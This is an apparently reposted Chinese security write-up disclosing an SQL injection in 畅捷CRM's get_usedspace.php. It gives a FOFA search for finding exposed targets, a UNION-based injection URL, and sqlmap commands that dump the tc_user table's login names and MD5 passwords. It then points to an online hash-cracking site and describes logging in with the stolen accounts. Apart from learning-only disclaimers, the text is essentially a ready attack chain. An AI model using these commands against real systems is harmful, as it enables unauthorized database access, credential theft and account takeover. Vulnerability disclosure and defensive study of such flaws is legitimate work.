免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
畅捷CRM get_userspace.php文件中 site_id参数存在SQL注入漏洞
二、影响范围
畅捷CRM
三、fofa查询
title="畅捷CRM"四、漏洞检测
直接浏览器访问:
http://ip:port/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)--返回结果如下,则存在SQL注入漏洞
批量监测
五、漏洞利用
使用SQLmap进行漏洞利用
获取当前数据库名称
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch --current-db
获取当前数据库表名
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch --dbms=mysql -D crmsaas_plus --tables
获取系统当前用户名密码, 密码都是md5 加密的,简单的密码会自动爆破出来。
sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch -D crmsaas_plus -T tc_user -C login_name,login_password -dump
可以使用https://cmd5.com/ 对加密的密码解密
获取账号密码后成功登录
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
原文始发于微信公众号(网络安全透视镜):【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码
